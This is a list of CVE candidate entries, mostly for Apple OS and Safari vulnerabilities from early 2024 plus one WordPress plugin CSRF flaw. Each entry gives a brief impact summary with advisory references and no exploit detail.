CVE 2024 23260 Candidate This issue was addressed by removing additional entitlements. This issue is fixed in macOS Sonoma 14.4. An app may be able to access user-sensitive data. FULLDISC:20240313 APPLE-SA-03-07-2024-2 macOS Sonoma 14.4 | URL:http://seclists.org/fulldisclosure/2024/Mar/21 | MISC:https://support.apple.com/en-us/HT214084 | URL:https://support.apple.com/en-us/HT214084 Assigned (20240112)
CVE 2024 2326 Candidate The Pretty Links – Affiliate Links, Link Branding, Link Tracking & Marketing Plugin plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.6.3. This is due to missing or incorrect nonce validation when saving plugin settings. This makes it possible for unauthenticated attackers to change the plugin's configuration including stripe integration via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3049386%40pretty-link&new=3049386%40pretty-link&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3049386%40pretty-link&new=3049386%40pretty-link&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/97d78b4b-568e-43e7-bebf-091179c321f6?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/97d78b4b-568e-43e7-bebf-091179c321f6?source=cve Assigned (20240308)
CVE 2024 23259 Candidate The issue was addressed with improved checks. This issue is fixed in iOS 16.7.6 and iPadOS 16.7.6, iOS 17.4 and iPadOS 17.4, macOS Sonoma 14.4. Processing web content may lead to a denial-of-service. FULLDISC:20240313 APPLE-SA-03-07-2024-2 macOS Sonoma 14.4 | URL:http://seclists.org/fulldisclosure/2024/Mar/21 | MISC:https://support.apple.com/en-us/HT214081 | URL:https://support.apple.com/en-us/HT214081 | MISC:https://support.apple.com/en-us/HT214082 | URL:https://support.apple.com/en-us/HT214082 | MISC:https://support.apple.com/en-us/HT214084 | URL:https://support.apple.com/en-us/HT214084 Assigned (20240112)
CVE 2024 23258 Candidate An out-of-bounds read was addressed with improved input validation. This issue is fixed in visionOS 1.1, macOS Sonoma 14.4. Processing an image may lead to arbitrary code execution. FULLDISC:20240313 APPLE-SA-03-07-2024-2 macOS Sonoma 14.4 | URL:http://seclists.org/fulldisclosure/2024/Mar/21 | FULLDISC:20240313 APPLE-SA-03-07-2024-7 visionOS 1.1 | URL:http://seclists.org/fulldisclosure/2024/Mar/26 | MISC:https://support.apple.com/en-us/HT214084 | URL:https://support.apple.com/en-us/HT214084 | MISC:https://support.apple.com/en-us/HT214087 | URL:https://support.apple.com/en-us/HT214087 Assigned (20240112)
CVE 2024 23257 Candidate The issue was addressed with improved memory handling. This issue is fixed in macOS Monterey 12.7.4, macOS Ventura 13.6.5, macOS Sonoma 14.4, visionOS 1.1, iOS 16.7.6 and iPadOS 16.7.6. Processing an image may result in disclosure of process memory. FULLDISC:20240313 APPLE-SA-03-07-2024-2 macOS Sonoma 14.4 | URL:http://seclists.org/fulldisclosure/2024/Mar/21 | FULLDISC:20240313 APPLE-SA-03-07-2024-3 macOS Ventura 13.6.5 | URL:http://seclists.org/fulldisclosure/2024/Mar/22 | FULLDISC:20240313 APPLE-SA-03-07-2024-4 macOS Monterey 12.7.4 | URL:http://seclists.org/fulldisclosure/2024/Mar/23 | FULLDISC:20240313 APPLE-SA-03-07-2024-7 visionOS 1.1 | URL:http://seclists.org/fulldisclosure/2024/Mar/26 | MISC:https://support.apple.com/en-us/HT214082 | URL:https://support.apple.com/en-us/HT214082 | MISC:https://support.apple.com/en-us/HT214083 | URL:https://support.apple.com/en-us/HT214083 | MISC:https://support.apple.com/en-us/HT214084 | URL:https://support.apple.com/en-us/HT214084 | MISC:https://support.apple.com/en-us/HT214085 | URL:https://support.apple.com/en-us/HT214085 | MISC:https://support.apple.com/en-us/HT214087 | URL:https://support.apple.com/en-us/HT214087 Assigned (20240112)
CVE 2024 23256 Candidate A logic issue was addressed with improved state management. This issue is fixed in iOS 17.4 and iPadOS 17.4. A user's locked tabs may be briefly visible while switching tab groups when Locked Private Browsing is enabled. FULLDISC:20240313 APPLE-SA-03-05-2024-1 iOS 17.4 and iPadOS 17.4 | URL:http://seclists.org/fulldisclosure/2024/Mar/18 | MISC:https://support.apple.com/en-us/HT214081 | URL:https://support.apple.com/en-us/HT214081 Assigned (20240112)
CVE 2024 23255 Candidate An authentication issue was addressed with improved state management. This issue is fixed in macOS Sonoma 14.4, iOS 17.4 and iPadOS 17.4. Photos in the Hidden Photos Album may be viewed without authentication. FULLDISC:20240313 APPLE-SA-03-07-2024-2 macOS Sonoma 14.4 | URL:http://seclists.org/fulldisclosure/2024/Mar/21 | MISC:https://support.apple.com/en-us/HT214081 | URL:https://support.apple.com/en-us/HT214081 | MISC:https://support.apple.com/en-us/HT214084 | URL:https://support.apple.com/en-us/HT214084 Assigned (20240112)
CVE 2024 23254 Candidate The issue was addressed with improved UI handling. This issue is fixed in tvOS 17.4, macOS Sonoma 14.4, visionOS 1.1, iOS 17.4 and iPadOS 17.4, watchOS 10.4, Safari 17.4. A malicious website may exfiltrate audio data cross-origin. FULLDISC:20240313 APPLE-SA-03-07-2024-1 Safari 17.4 | URL:http://seclists.org/fulldisclosure/2024/Mar/20 | FULLDISC:20240313 APPLE-SA-03-07-2024-2 macOS Sonoma 14.4 | URL:http://seclists.org/fulldisclosure/2024/Mar/21 | FULLDISC:20240313 APPLE-SA-03-07-2024-5 watchOS 10.4 | URL:http://seclists.org/fulldisclosure/2024/Mar/24 | FULLDISC:20240313 APPLE-SA-03-07-2024-6 tvOS 17.4 | URL:http://seclists.org/fulldisclosure/2024/Mar/25 | FULLDISC:20240313 APPLE-SA-03-07-2024-7 visionOS 1.1 | URL:http://seclists.org/fulldisclosure/2024/Mar/26 | MISC:https://support.apple.com/en-us/HT214081 | URL:https://support.apple.com/en-us/HT214081 | MISC:https://support.apple.com/en-us/HT214084 | URL:https://support.apple.com/en-us/HT214084 | MISC:https://support.apple.com/en-us/HT214086 | URL:https://support.apple.com/en-us/HT214086 | MISC:https://support.apple.com/en-us/HT214087 | URL:https://support.apple.com/en-us/HT214087 | MISC:https://support.apple.com/en-us/HT214088 | URL:https://support.apple.com/en-us/HT214088 | MISC:https://support.apple.com/en-us/HT214089 | URL:https://support.apple.com/en-us/HT214089 Assigned (20240112)
CVE 2024 23253 Candidate A permissions issue was addressed with additional restrictions. This issue is fixed in macOS Sonoma 14.4. An app may be able to access a user's Photos Library. FULLDISC:20240313 APPLE-SA-03-07-2024-2 macOS Sonoma 14.4 | URL:http://seclists.org/fulldisclosure/2024/Mar/21 | MISC:https://support.apple.com/en-us/HT214084 | URL:https://support.apple.com/en-us/HT214084 Assigned (20240112)
CVE 2024 23252 Candidate The issue was addressed with improved memory handling. This issue is fixed in Safari 17.4, iOS 17.4 and iPadOS 17.4, macOS Sonoma 14.4. Processing web content may lead to a denial-of-service. FULLDISC:20240313 APPLE-SA-03-07-2024-1 Safari 17.4 | URL:http://seclists.org/fulldisclosure/2024/Mar/20 | FULLDISC:20240313 APPLE-SA-03-07-2024-2 macOS Sonoma 14.4 | URL:http://seclists.org/fulldisclosure/2024/Mar/21 | MISC:https://support.apple.com/en-us/HT214081 | URL:https://support.apple.com/en-us/HT214081 | MISC:https://support.apple.com/en-us/HT214084 | URL:https://support.apple.com/en-us/HT214084 | MISC:https://support.apple.com/en-us/HT214089 | URL:https://support.apple.com/en-us/HT214089 Assigned (20240112)
CVE 2024 23250 Candidate An access issue was addressed with improved access restrictions. This issue is fixed in tvOS 17.4, iOS 17.4 and iPadOS 17.4, macOS Sonoma 14.4, watchOS 10.4. An app may be able to access Bluetooth-connected microphones without user permission. FULLDISC:20240313 APPLE-SA-03-07-2024-2 macOS Sonoma 14.4 | URL:http://seclists.org/fulldisclosure/2024/Mar/21 | FULLDISC:20240313 APPLE-SA-03-07-2024-5 watchOS 10.4 | URL:http://seclists.org/fulldisclosure/2024/Mar/24 | FULLDISC:20240313 APPLE-SA-03-07-2024-6 tvOS 17.4 | URL:http://seclists.org/fulldisclosure/2024/Mar/25 | MISC:https://support.apple.com/en-us/HT214081 | URL:https://support.apple.com/en-us/HT214081 | MISC:https://support.apple.com/en-us/HT214084 | URL:https://support.apple.com/en-us/HT214084 | MISC:https://support.apple.com/en-us/HT214086 | URL:https://support.apple.com/en-us/HT214086 | MISC:https://support.apple.com/en-us/HT214088 | URL:https://support.apple.com/en-us/HT214088 Assigned (20240112)
CVE 2024 23249 Candidate The issue was addressed with improved memory handling. This issue is fixed in macOS Sonoma 14.4. Processing a file may lead to a denial-of-service or potentially disclose memory contents. FULLDISC:20240313 APPLE-SA-03-07-2024-2 macOS Sonoma 14.4 | URL:http://seclists.org/fulldisclosure/2024/Mar/21 | MISC:https://support.apple.com/en-us/HT214084 | URL:https://support.apple.com/en-us/HT214084 Assigned (20240112)
CVE 2024 23247 Candidate The issue was addressed with improved memory handling. This issue is fixed in macOS Sonoma 14.4, macOS Monterey 12.7.4, macOS Ventura 13.6.5. Processing a file may lead to unexpected app termination or arbitrary code execution. FULLDISC:20240313 APPLE-SA-03-07-2024-2 macOS Sonoma 14.4 | URL:http://seclists.org/fulldisclosure/2024/Mar/21 | FULLDISC:20240313 APPLE-SA-03-07-2024-3 macOS Ventura 13.6.5 | URL:http://seclists.org/fulldisclosure/2024/Mar/22 | FULLDISC:20240313 APPLE-SA-03-07-2024-4 macOS Monterey 12.7.4 | URL:http://seclists.org/fulldisclosure/2024/Mar/23 | MISC:https://support.apple.com/en-us/HT214083 | URL:https://support.apple.com/en-us/HT214083 | MISC:https://support.apple.com/en-us/HT214084 | URL:https://support.apple.com/en-us/HT214084 | MISC:https://support.apple.com/en-us/HT214085 | URL:https://support.apple.com/en-us/HT214085 Assigned (20240112)
CVE 2024 23246 Candidate This issue was addressed by removing the vulnerable code. This issue is fixed in macOS Sonoma 14.4, visionOS 1.1, iOS 17.4 and iPadOS 17.4, watchOS 10.4, iOS 16.7.6 and iPadOS 16.7.6, tvOS 17.4. An app may be able to break out of its sandbox. FULLDISC:20240313 APPLE-SA-03-07-2024-2 macOS Sonoma 14.4 | URL:http://seclists.org/fulldisclosure/2024/Mar/21 | FULLDISC:20240313 APPLE-SA-03-07-2024-5 watchOS 10.4 | URL:http://seclists.org/fulldisclosure/2024/Mar/24 | FULLDISC:20240313 APPLE-SA-03-07-2024-6 tvOS 17.4 | URL:http://seclists.org/fulldisclosure/2024/Mar/25 | FULLDISC:20240313 APPLE-SA-03-07-2024-7 visionOS 1.1 | URL:http://seclists.org/fulldisclosure/2024/Mar/26 | MISC:https://support.apple.com/en-us/HT214081 | URL:https://support.apple.com/en-us/HT214081 | MISC:https://support.apple.com/en-us/HT214082 | URL:https://support.apple.com/en-us/HT214082 | MISC:https://support.apple.com/en-us/HT214084 | URL:https://support.apple.com/en-us/HT214084 | MISC:https://support.apple.com/en-us/HT214086 | URL:https://support.apple.com/en-us/HT214086 | MISC:https://support.apple.com/en-us/HT214087 | URL:https://support.apple.com/en-us/HT214087 | MISC:https://support.apple.com/en-us/HT214088 | URL:https://support.apple.com/en-us/HT214088 Assigned (20240112)
CVE 2024 23245 Candidate This issue was addressed by adding an additional prompt for user consent. This issue is fixed in macOS Sonoma 14.4, macOS Monterey 12.7.4, macOS Ventura 13.6.5. Third-party shortcuts may use a legacy action from Automator to send events to apps without user consent. FULLDISC:20240313 APPLE-SA-03-07-2024-2 macOS Sonoma 14.4 | URL:http://seclists.org/fulldisclosure/2024/Mar/21 | FULLDISC:20240313 APPLE-SA-03-07-2024-3 macOS Ventura 13.6.5 | URL:http://seclists.org/fulldisclosure/2024/Mar/22 | FULLDISC:20240313 APPLE-SA-03-07-2024-4 macOS Monterey 12.7.4 | URL:http://seclists.org/fulldisclosure/2024/Mar/23 | MISC:https://support.apple.com/en-us/HT214083 | URL:https://support.apple.com/en-us/HT214083 | MISC:https://support.apple.com/en-us/HT214084 | URL:https://support.apple.com/en-us/HT214084 | MISC:https://support.apple.com/en-us/HT214085 | URL:https://support.apple.com/en-us/HT214085 Assigned (20240112)
CVE 2024 23244 Candidate A logic issue was addressed with improved restrictions. This issue is fixed in macOS Sonoma 14.4, macOS Monterey 12.7.4. An app from a standard user account may be able to escalate privilege after admin user login. FULLDISC:20240313 APPLE-SA-03-07-2024-2 macOS Sonoma 14.4 | URL:http://seclists.org/fulldisclosure/2024/Mar/21 | FULLDISC:20240313 APPLE-SA-03-07-2024-4 macOS Monterey 12.7.4 | URL:http://seclists.org/fulldisclosure/2024/Mar/23 | MISC:https://support.apple.com/en-us/HT214083 | URL:https://support.apple.com/en-us/HT214083 | MISC:https://support.apple.com/en-us/HT214084 | URL:https://support.apple.com/en-us/HT214084 Assigned (20240112)
CVE 2024 23243 Candidate A privacy issue was addressed with improved private data redaction for log entries. This issue is fixed in iOS 17.4 and iPadOS 17.4. An app may be able to read sensitive location information. FULLDISC:20240313 APPLE-SA-03-05-2024-1 iOS 17.4 and iPadOS 17.4 | URL:http://seclists.org/fulldisclosure/2024/Mar/18 | MISC:https://support.apple.com/en-us/HT214081 | URL:https://support.apple.com/en-us/HT214081 Assigned (20240112)
CVE 2024 23242 Candidate A privacy issue was addressed by not logging contents of text fields. This issue is fixed in macOS Sonoma 14.4, iOS 17.4 and iPadOS 17.4. An app may be able to view Mail data. FULLDISC:20240313 APPLE-SA-03-07-2024-2 macOS Sonoma 14.4 | URL:http://seclists.org/fulldisclosure/2024/Mar/21 | MISC:https://support.apple.com/en-us/HT214081 | URL:https://support.apple.com/en-us/HT214081 | MISC:https://support.apple.com/en-us/HT214084 | URL:https://support.apple.com/en-us/HT214084 Assigned (20240112)
CVE 2024 23241 Candidate This issue was addressed through improved state management. This issue is fixed in tvOS 17.4, iOS 17.4 and iPadOS 17.4, macOS Sonoma 14.4. An app may be able to leak sensitive user information. FULLDISC:20240313 APPLE-SA-03-07-2024-2 macOS Sonoma 14.4 | URL:http://seclists.org/fulldisclosure/2024/Mar/21 | FULLDISC:20240313 APPLE-SA-03-07-2024-6 tvOS 17.4 | URL:http://seclists.org/fulldisclosure/2024/Mar/25 | MISC:https://support.apple.com/en-us/HT214081 | URL:https://support.apple.com/en-us/HT214081 | MISC:https://support.apple.com/en-us/HT214084 | URL:https://support.apple.com/en-us/HT214084 | MISC:https://support.apple.com/en-us/HT214086 | URL:https://support.apple.com/en-us/HT214086 Assigned (20240112)
CVE 2024 23240 Candidate The issue was addressed with improved checks. This issue is fixed in iOS 17.4 and iPadOS 17.4. Shake-to-undo may allow a deleted photo to be re-surfaced without authentication. MISC:https://support.apple.com/en-us/HT214081 | URL:https://support.apple.com/en-us/HT214081 Assigned (20240112)
CVE 2024 23239 Candidate A race condition was addressed with improved state handling. This issue is fixed in tvOS 17.4, iOS 17.4 and iPadOS 17.4, macOS Sonoma 14.4, watchOS 10.4. An app may be able to leak sensitive user information. FULLDISC:20240313 APPLE-SA-03-07-2024-2 macOS Sonoma 14.4 | URL:http://seclists.org/fulldisclosure/2024/Mar/21 | FULLDISC:20240313 APPLE-SA-03-07-2024-5 watchOS 10.4 | URL:http://seclists.org/fulldisclosure/2024/Mar/24 | FULLDISC:20240313 APPLE-SA-03-07-2024-6 tvOS 17.4 | URL:http://seclists.org/fulldisclosure/2024/Mar/25 | MISC:https://support.apple.com/en-us/HT214081 | URL:https://support.apple.com/en-us/HT214081 | MISC:https://support.apple.com/en-us/HT214084 | URL:https://support.apple.com/en-us/HT214084 | MISC:https://support.apple.com/en-us/HT214086 | URL:https://support.apple.com/en-us/HT214086 | MISC:https://support.apple.com/en-us/HT214088 | URL:https://support.apple.com/en-us/HT214088 Assigned (20240112)
CVE 2024 23238 Candidate An access issue was addressed with improved access restrictions. This issue is fixed in macOS Sonoma 14.4. An app may be able to edit NVRAM variables. FULLDISC:20240313 APPLE-SA-03-07-2024-2 macOS Sonoma 14.4 | URL:http://seclists.org/fulldisclosure/2024/Mar/21 | MISC:https://support.apple.com/en-us/HT214084 | URL:https://support.apple.com/en-us/HT214084 Assigned (20240112)
CVE 2024 23235 Candidate A race condition was addressed with additional validation. This issue is fixed in macOS Sonoma 14.4, visionOS 1.1, iOS 17.4 and iPadOS 17.4, watchOS 10.4, iOS 16.7.6 and iPadOS 16.7.6, tvOS 17.4. An app may be able to access user-sensitive data. FULLDISC:20240313 APPLE-SA-03-07-2024-2 macOS Sonoma 14.4 | URL:http://seclists.org/fulldisclosure/2024/Mar/21 | FULLDISC:20240313 APPLE-SA-03-07-2024-5 watchOS 10.4 | URL:http://seclists.org/fulldisclosure/2024/Mar/24 | FULLDISC:20240313 APPLE-SA-03-07-2024-6 tvOS 17.4 | URL:http://seclists.org/fulldisclosure/2024/Mar/25 | FULLDISC:20240313 APPLE-SA-03-07-2024-7 visionOS 1.1 | URL:http://seclists.org/fulldisclosure/2024/Mar/26 | MISC:https://support.apple.com/en-us/HT214081 | URL:https://support.apple.com/en-us/HT214081 | MISC:https://support.apple.com/en-us/HT214082 | URL:https://support.apple.com/en-us/HT214082 | MISC:https://support.apple.com/en-us/HT214084 | URL:https://support.apple.com/en-us/HT214084 | MISC:https://support.apple.com/en-us/HT214086 | URL:https://support.apple.com/en-us/HT214086 | MISC:https://support.apple.com/en-us/HT214087 | URL:https://support.apple.com/en-us/HT214087 | MISC:https://support.apple.com/en-us/HT214088 | URL:https://support.apple.com/en-us/HT214088 Assigned (20240112)
CVE 2024 23234 Candidate An out-of-bounds write issue was addressed with improved input validation. This issue is fixed in macOS Sonoma 14.4, macOS Monterey 12.7.4, macOS Ventura 13.6.5. An app may be able to execute arbitrary code with kernel privileges. FULLDISC:20240313 APPLE-SA-03-07-2024-2 macOS Sonoma 14.4 | URL:http://seclists.org/fulldisclosure/2024/Mar/21 | FULLDISC:20240313 APPLE-SA-03-07-2024-3 macOS Ventura 13.6.5 | URL:http://seclists.org/fulldisclosure/2024/Mar/22 | FULLDISC:20240313 APPLE-SA-03-07-2024-4 macOS Monterey 12.7.4 | URL:http://seclists.org/fulldisclosure/2024/Mar/23 | MISC:https://support.apple.com/en-us/HT214083 | URL:https://support.apple.com/en-us/HT214083 | MISC:https://support.apple.com/en-us/HT214084 | URL:https://support.apple.com/en-us/HT214084 | MISC:https://support.apple.com/en-us/HT214085 | URL:https://support.apple.com/en-us/HT214085 Assigned (20240112)
CVE 2024 23233 Candidate This issue was addressed with improved checks. This issue is fixed in macOS Sonoma 14.4. Entitlements and privacy permissions granted to this app may be used by a malicious app. FULLDISC:20240313 APPLE-SA-03-07-2024-2 macOS Sonoma 14.4 | URL:http://seclists.org/fulldisclosure/2024/Mar/21 | MISC:https://support.apple.com/en-us/HT214084 | URL:https://support.apple.com/en-us/HT214084 Assigned (20240112)
CVE 2024 23232 Candidate A privacy issue was addressed with improved handling of temporary files. This issue is fixed in macOS Sonoma 14.4. An app may be able to capture a user's screen. FULLDISC:20240313 APPLE-SA-03-07-2024-2 macOS Sonoma 14.4 | URL:http://seclists.org/fulldisclosure/2024/Mar/21 | MISC:https://support.apple.com/en-us/HT214084 | URL:https://support.apple.com/en-us/HT214084 Assigned (20240112)
CVE 2024 23231 Candidate A privacy issue was addressed with improved private data redaction for log entries. This issue is fixed in macOS Ventura 13.6.5, macOS Sonoma 14.4, iOS 17.4 and iPadOS 17.4, watchOS 10.4, iOS 16.7.6 and iPadOS 16.7.6. An app may be able to access user-sensitive data. CONFIRM:https://support.apple.com/kb/HT214085 | FULLDISC:20240313 APPLE-SA-03-07-2024-2 macOS Sonoma 14.4 | URL:http://seclists.org/fulldisclosure/2024/Mar/21 | FULLDISC:20240313 APPLE-SA-03-07-2024-3 macOS Ventura 13.6.5 | URL:http://seclists.org/fulldisclosure/2024/Mar/22 | FULLDISC:20240313 APPLE-SA-03-07-2024-5 watchOS 10.4 | URL:http://seclists.org/fulldisclosure/2024/Mar/24 | MISC:https://support.apple.com/en-us/HT214081 | URL:https://support.apple.com/en-us/HT214081 | MISC:https://support.apple.com/en-us/HT214082 | URL:https://support.apple.com/en-us/HT214082 | MISC:https://support.apple.com/en-us/HT214084 | URL:https://support.apple.com/en-us/HT214084 | MISC:https://support.apple.com/en-us/HT214085 | URL:https://support.apple.com/en-us/HT214085 | MISC:https://support.apple.com/en-us/HT214088 | URL:https://support.apple.com/en-us/HT214088 Assigned (20240112)
CVE 2024 23230 Candidate This issue was addressed with improved file handling. This issue is fixed in macOS Sonoma 14.4, macOS Monterey 12.7.4, macOS Ventura 13.6.5. An app may be able to access sensitive user data. FULLDISC:20240313 APPLE-SA-03-07-2024-2 macOS Sonoma 14.4 | URL:http://seclists.org/fulldisclosure/2024/Mar/21 | FULLDISC:20240313 APPLE-SA-03-07-2024-3 macOS Ventura 13.6.5 | URL:http://seclists.org/fulldisclosure/2024/Mar/22 | FULLDISC:20240313 APPLE-SA-03-07-2024-4 macOS Monterey 12.7.4 | URL:http://seclists.org/fulldisclosure/2024/Mar/23 | MISC:https://support.apple.com/en-us/HT214083 | URL:https://support.apple.com/en-us/HT214083 | MISC:https://support.apple.com/en-us/HT214084 | URL:https://support.apple.com/en-us/HT214084 | MISC:https://support.apple.com/en-us/HT214085 | URL:https://support.apple.com/en-us/HT214085 Assigned (20240112)
CVE 2024 23227 Candidate This issue was addressed with improved redaction of sensitive information. This issue is fixed in macOS Sonoma 14.4, macOS Monterey 12.7.4, macOS Ventura 13.6.5. An app may be able to read sensitive location information. FULLDISC:20240313 APPLE-SA-03-07-2024-2 macOS Sonoma 14.4 | URL:http://seclists.org/fulldisclosure/2024/Mar/21 | FULLDISC:20240313 APPLE-SA-03-07-2024-3 macOS Ventura 13.6.5 | URL:http://seclists.org/fulldisclosure/2024/Mar/22 | FULLDISC:20240313 APPLE-SA-03-07-2024-4 macOS Monterey 12.7.4 | URL:http://seclists.org/fulldisclosure/2024/Mar/23 | MISC:https://support.apple.com/en-us/HT214083 | URL:https://support.apple.com/en-us/HT214083 | MISC:https://support.apple.com/en-us/HT214084 | URL:https://support.apple.com/en-us/HT214084 | MISC:https://support.apple.com/en-us/HT214085 | URL:https://support.apple.com/en-us/HT214085 Assigned (20240112)
CVE 2024 23226 Candidate The issue was addressed with improved memory handling. This issue is fixed in macOS Sonoma 14.4, visionOS 1.1, iOS 17.4 and iPadOS 17.4, watchOS 10.4, tvOS 17.4. Processing web content may lead to arbitrary code execution. MISC:http://seclists.org/fulldisclosure/2024/Mar/21 | URL:http://seclists.org/fulldisclosure/2024/Mar/21 | MISC:http://seclists.org/fulldisclosure/2024/Mar/24 | URL:http://seclists.org/fulldisclosure/2024/Mar/24 | MISC:http://seclists.org/fulldisclosure/2024/Mar/25 | URL:http://seclists.org/fulldisclosure/2024/Mar/25 | MISC:http://seclists.org/fulldisclosure/2024/Mar/26 | URL:http://seclists.org/fulldisclosure/2024/Mar/26 | MISC:https://support.apple.com/en-us/HT214081 | URL:https://support.apple.com/en-us/HT214081 | MISC:https://support.apple.com/en-us/HT214084 | URL:https://support.apple.com/en-us/HT214084 | MISC:https://support.apple.com/en-us/HT214086 | URL:https://support.apple.com/en-us/HT214086 | MISC:https://support.apple.com/en-us/HT214087 | URL:https://support.apple.com/en-us/HT214087 | MISC:https://support.apple.com/en-us/HT214088 | URL:https://support.apple.com/en-us/HT214088 Assigned (20240112)
CVE 2024 23225 Candidate A memory corruption issue was addressed with improved validation. This issue is fixed in iOS 16.7.6 and iPadOS 16.7.6, iOS 17.4 and iPadOS 17.4. An attacker with arbitrary kernel read and write capability may be able to bypass kernel memory protections. Apple is aware of a report that this issue may have been exploited. CONFIRM:https://support.apple.com/kb/HT214083 | CONFIRM:https://support.apple.com/kb/HT214084 | CONFIRM:https://support.apple.com/kb/HT214085 | CONFIRM:https://support.apple.com/kb/HT214086 | CONFIRM:https://support.apple.com/kb/HT214087 | CONFIRM:https://support.apple.com/kb/HT214088 | FULLDISC:20240313 APPLE-SA-03-05-2024-1 iOS 17.4 and iPadOS 17.4 | URL:http://seclists.org/fulldisclosure/2024/Mar/18 | FULLDISC:20240313 APPLE-SA-03-05-2024-2 iOS 16.7.6 and iPadOS 16.7.6 | URL:http://seclists.org/fulldisclosure/2024/Mar/19 | FULLDISC:20240313 APPLE-SA-03-07-2024-2 macOS Sonoma 14.4 | URL:http://seclists.org/fulldisclosure/2024/Mar/21 | FULLDISC:20240313 APPLE-SA-03-07-2024-3 macOS Ventura 13.6.5 | URL:http://seclists.org/fulldisclosure/2024/Mar/22 | FULLDISC:20240313 APPLE-SA-03-07-2024-4 macOS Monterey 12.7.4 | URL:http://seclists.org/fulldisclosure/2024/Mar/23 | FULLDISC:20240313 APPLE-SA-03-07-2024-5 watchOS 10.4 | URL:http://seclists.org/fulldisclosure/2024/Mar/24 | FULLDISC:20240313 APPLE-SA-03-07-2024-6 tvOS 17.4 | URL:http://seclists.org/fulldisclosure/2024/Mar/25 | FULLDISC:20240313 APPLE-SA-03-07-2024-7 visionOS 1.1 | URL:http://seclists.org/fulldisclosure/2024/Mar/26 | MISC:https://support.apple.com/en-us/HT214081 | URL:https://support.apple.com/en-us/HT214081 | MISC:https://support.apple.com/en-us/HT214082 | URL:https://support.apple.com/en-us/HT214082 Assigned (20240112)
CVE 2024 23224 Candidate The issue was addressed with improved checks. This issue is fixed in macOS Sonoma 14.3, macOS Ventura 13.6.4. An app may be able to access sensitive user data. FULLDISC:20240126 APPLE-SA-01-22-2024-5 macOS Sonoma 14.3 | URL:http://seclists.org/fulldisclosure/2024/Jan/36 | FULLDISC:20240126 APPLE-SA-01-22-2024-6 macOS Ventura 13.6.4 | URL:http://seclists.org/fulldisclosure/2024/Jan/37 | MISC:https://support.apple.com/en-us/HT214058 | URL:https://support.apple.com/en-us/HT214058 | MISC:https://support.apple.com/en-us/HT214061 | URL:https://support.apple.com/en-us/HT214061 Assigned (20240112)
CVE 2024 23223 Candidate A privacy issue was addressed with improved handling of files. This issue is fixed in macOS Sonoma 14.3, watchOS 10.3, tvOS 17.3, iOS 17.3 and iPadOS 17.3. An app may be able to access sensitive user data. FULLDISC:20240126 APPLE-SA-01-22-2024-2 iOS 17.3 and iPadOS 17.3 | URL:http://seclists.org/fulldisclosure/2024/Jan/33 | FULLDISC:20240126 APPLE-SA-01-22-2024-5 macOS Sonoma 14.3 | URL:http://seclists.org/fulldisclosure/2024/Jan/36 | FULLDISC:20240126 APPLE-SA-01-22-2024-8 watchOS 10.3 | URL:http://seclists.org/fulldisclosure/2024/Jan/39 | FULLDISC:20240126 APPLE-SA-01-22-2024-9 tvOS 17.3 | URL:http://seclists.org/fulldisclosure/2024/Jan/40 | MISC:https://support.apple.com/en-us/HT214055 | URL:https://support.apple.com/en-us/HT214055 | MISC:https://support.apple.com/en-us/HT214059 | URL:https://support.apple.com/en-us/HT214059 | MISC:https://support.apple.com/en-us/HT214060 | URL:https://support.apple.com/en-us/HT214060 | MISC:https://support.apple.com/en-us/HT214061 | URL:https://support.apple.com/en-us/HT214061 Assigned (20240112)
CVE 2024 23222 Candidate A type confusion issue was addressed with improved checks. This issue is fixed in iOS 17.3 and iPadOS 17.3, macOS Sonoma 14.3, tvOS 17.3. Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been exploited. MISC:https://support.apple.com/en-us/HT214055 | URL:https://support.apple.com/en-us/HT214055 | MISC:https://support.apple.com/en-us/HT214059 | URL:https://support.apple.com/en-us/HT214059 | MISC:https://support.apple.com/en-us/HT214061 | URL:https://support.apple.com/en-us/HT214061 Assigned (20240112)
CVE 2024 23220 Candidate The issue was addressed with improved handling of caches. This issue is fixed in visionOS 1.1, iOS 17.4 and iPadOS 17.4. An app may be able to fingerprint the user. FULLDISC:20240313 APPLE-SA-03-07-2024-7 visionOS 1.1 | URL:http://seclists.org/fulldisclosure/2024/Mar/26 | MISC:https://support.apple.com/en-us/HT214081 | URL:https://support.apple.com/en-us/HT214081 | MISC:https://support.apple.com/en-us/HT214087 | URL:https://support.apple.com/en-us/HT214087 Assigned (20240112)
CVE 2024 23219 Candidate The issue was addressed with improved authentication. This issue is fixed in iOS 17.3 and iPadOS 17.3. Stolen Device Protection may be unexpectedly disabled. FULLDISC:20240126 APPLE-SA-01-22-2024-2 iOS 17.3 and iPadOS 17.3 | URL:http://seclists.org/fulldisclosure/2024/Jan/33 | MISC:https://support.apple.com/en-us/HT214059 | URL:https://support.apple.com/en-us/HT214059 Assigned (20240112)
CVE 2024 23218 Candidate A timing side-channel issue was addressed with improvements to constant-time computation in cryptographic functions. This issue is fixed in macOS Sonoma 14.3, watchOS 10.3, tvOS 17.3, iOS 17.3 and iPadOS 17.3. An attacker may be able to decrypt legacy RSA PKCS#1 v1.5 ciphertexts without having the private key. CONFIRM:https://support.apple.com/kb/HT214082 | CONFIRM:https://support.apple.com/kb/HT214083 | CONFIRM:https://support.apple.com/kb/HT214085 | FULLDISC:20240126 APPLE-SA-01-22-2024-2 iOS 17.3 and iPadOS 17.3 | URL:http://seclists.org/fulldisclosure/2024/Jan/33 | FULLDISC:20240126 APPLE-SA-01-22-2024-5 macOS Sonoma 14.3 | URL:http://seclists.org/fulldisclosure/2024/Jan/36 | FULLDISC:20240126 APPLE-SA-01-22-2024-8 watchOS 10.3 | URL:http://seclists.org/fulldisclosure/2024/Jan/39 | FULLDISC:20240126 APPLE-SA-01-22-2024-9 tvOS 17.3 | URL:http://seclists.org/fulldisclosure/2024/Jan/40 | FULLDISC:20240313 APPLE-SA-03-07-2024-3 macOS Ventura 13.6.5 | URL:http://seclists.org/fulldisclosure/2024/Mar/22 | FULLDISC:20240313 APPLE-SA-03-07-2024-4 macOS Monterey 12.7.4 | URL:http://seclists.org/fulldisclosure/2024/Mar/23 | MISC:https://support.apple.com/en-us/HT214055 | URL:https://support.apple.com/en-us/HT214055 | 